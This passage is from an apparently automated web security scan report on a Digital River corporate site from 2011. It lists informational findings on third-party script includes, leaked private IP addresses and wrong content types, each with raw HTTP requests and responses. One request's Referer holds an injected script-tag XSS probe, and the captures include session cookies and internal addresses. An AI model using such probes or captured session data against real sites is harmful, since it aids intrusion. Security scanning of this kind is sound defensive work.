fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131233612263,0) Date: Sun, 04 Sep 2011 14:17:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app58 Content-Length: 67513 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <li><a href="https://cm.commerce5.com"> Commerce Manager</a>...[SNIP]... <li><a href="https://cp.element5.com"> element 5</a>...[SNIP]... <div id="headTwitter"><a id="twitter" href="http://www.twitter.com/digitalriverinc" target="_blank"> <img alt="Twitter" title="Twitter" src="/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif" />...[SNIP]... <li> <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=94762&p=irol-irhome" onmouseover="showSubNavContent(3,5);"> Investor Relations</a>...[SNIP]... <map name="globalocitymap"> <area shape="rect" coords="814,21,924,52" href="http://www.goglobalocity.com" alt="" /> </map>...[SNIP]... <div id="twitter_follow_box"> <a href="http://www.twitter.com/digitalriverinc" target="_blank"> <img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/twitter_follow.gif" alt="follow us on twitter">...[SNIP]... <div id="twitter_join"> <a href="http://www.twitter.com/digitalriverinc" target="_blank"> Join the<br>...[SNIP]... </div> <a href="http://bcove.me/phdjojzi" class="home_video_link" title="Transparent Commerce"> <img id="home_video_play" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/videoThumb_TransparentCommerce.jpg" alt="blog">...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"> </script>...[SNIP]...
4. Cross-domain script include
previous
next
There are 4 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
4.1. http://corporate.digitalriver.com/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store
Issue detail
The response dynamically includes the following script from another domain:http://t2.trackalyzer.com/trackalyze.js
Request
GET /store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0 HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145926231; fcPT=http%3A//corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs; fcC=X=C708273219&Y=1315145926358&FV=10&H=1315145926231&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=2&E=201359&F=0&I=1315145947293
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=135528635791,0) Date: Sun, 04 Sep 2011 14:18:31 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53 Content-Length: 48013 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"> </script>...[SNIP]...
4.2. http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs
Issue detail
The response dynamically includes the following script from another domain:http://t2.trackalyzer.com/trackalyze.js
Request
GET /store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.1.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.2.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145848307; fcPT=http%3A//corporate.digitalriver.com/store/digriv/html/pbPage.Homepage%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1315145806740; fcC=X=C708273219&Y=1315145848489&FV=10&H=1315145848307&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=1&E=4615679&F=0&I=1315145925158
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=66809134971,0) Date: Sun, 04 Sep 2011 14:18:08 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53 Content-Length: 53162 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"> </script>...[SNIP]...
4.3. http://corporate.digitalriver.com/store/digriv/Corp/sectionName.payment/subSectionName.paymentOverview/page.paymentOverview
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/Corp/sectionName.payment/subSectionName.paymentOverview/page.paymentOverview
Issue detail
The response dynamically includes the following script from another domain:http://t2.trackalyzer.com/trackalyze.js
Request
GET /store/digriv/Corp/sectionName.payment/subSectionName.paymentOverview/page.paymentOverview HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=pci&x=0&y=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; RefURL=http%3A%2F%2Fcorporate.digitalriver.com%2Fstore%2Fdigriv%2FCorp%2FsectionName.company%2FsubSectionName.aboutUs%2Fpage.aboutUs; op_browser=safari_535.1; op_browserHigh=safari; op_os=windows; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.5.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.5.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145973870; fcPT=http%3A//corporate.digitalriver.com/store%3FAction%3DDisplayProductSearchResultsPage%26SiteID%3Ddigriv%26Locale%3Den_US%26ThemeID%3D16015700%26CallingPageID%3DCorpPage%26keywords%3Dpci%26x%3D0%26y%3D0; fcC=X=C708273219&Y=1315145973986&FV=10&H=1315145973870&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=4&E=3737408&F=0&I=1315145978185&vis=e500888zxss#e500888zpci
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=66809189281,0) Date: Sun, 04 Sep 2011 14:19:01 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53 Content-Length: 53886 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"> </script>...[SNIP]...
4.4. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/html/pbPage.Homepage
Issue detail
The response dynamically includes the following script from another domain:http://t2.trackalyzer.com/trackalyze.js
Request
GET /store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740 HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131233612263,0) Date: Sun, 04 Sep 2011 14:17:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app58 Content-Length: 67513 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"> </script>...[SNIP]...
5. Private IP addresses disclosed
previous
next
There are 2 instances of this issue:
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways. Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
5.1. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; op393dr_homepage_demo1gum=a04e07i0a12794q0634yf92b6; op393dr_homepage_demo1liid=a04e07i0a12794q0634yf92b6; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmb=94877326.1.10.1315146138; __utmc=94877326; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmb=94877326.2.10.1315146138; __utmc=94877326; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; BIGipServerp-drh-dc1pod5-pool1-active=3556901130.260.0000; fcOOS=fcOptOutChip=undefined; fcC=X=C781953390&Y=1315146141467&FV=-1&H=1315146141029&Z=0&E=2283193&F=0&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com; fcP=C=0&T=1315146141467&DTO=1315146141029&U=781953390&V=1315146141029; fcR=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; fcPT=http%3A//corporate.digitalriver.com/store/digriv/html/pbPage.Homepage%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1315145806740%26da9c3--%253E%253Cscript%253Eprompt%28document.location%29%253C/script%253Edd29a7ec5c0%3D1
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/css;charset=UTF-8 Set-Cookie: ORA_WX_SESSION="10.1.2.212 :260-0#0"; path=/ Set-Cookie: JSESSIONID=67095CF4E57BB1931F717EC7D3CE6B56; path=/ Set-Cookie: VISITOR_ID=971D4E8DFAED43674226FBB5874B1E24DDCD475DE29678F5; expires=Mon, 03-Sep-2012 20:10:59 GMT; path=/ Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=23859686939,0) Date: Sun, 04 Sep 2011 14:21:47 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app56 Content-Length: 6619 <!-- REQUEST ID: TIME=1315146107623:NODE=c1a5601:THREAD=242 --> <!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=digriv&ThemeID=16015700&ceid=175581900...[SNIP]...
5.2. http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://www.digitalriver.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: ORA_WX_SESSION="10.1.2.73 :260-0#0"; path=/ Set-Cookie: JSESSIONID=86C536518740DCEA6999FE20F5D60BBA; path=/ Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=23859425004,0) Date: Sun, 04 Sep 2011 14:17:33 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app58 Content-Length: 7656 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]...
6. Content type incorrectly stated
previous
There are 3 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
6.1. http://corporate.digitalriver.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://corporate.digitalriver.com
Path:
/favicon.ico
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /favicon.ico HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054
Response
HTTP/1.1 200 OK ETag: "37e-4b6b21a0"Content-Type: text/plain Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=19732;ecid=23859429193,0) Content-Length: 894 Date: Thu, 26 May 2011 19:48:13 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app58 Accept-Ranges: bytes ..............h.......(....... ...............H...H...........................................................VVW .....tOL+. ...Q. ...[SNIP]...
6.2. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
Issue detail
The response contains the following Content-type statement:Content-Type: text/css;charset=UTF-8 The response states that it contains CSS . However, it actually appears to contain plain text .
Request
GET /store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; fcPT=http%3A//corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs; op_browser=safari_535.1; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fcorporate.digitalriver.com%2Fstore%2Fdigriv%2FCorp%2FsectionName.company%2FsubSectionName.aboutUs%2Fpage.aboutUs; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.4.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.4.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145949666; fcC=X=C708273219&Y=1315145949793&FV=10&H=1315145949666&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=2&E=201359&F=0&I=1315145947293
Response
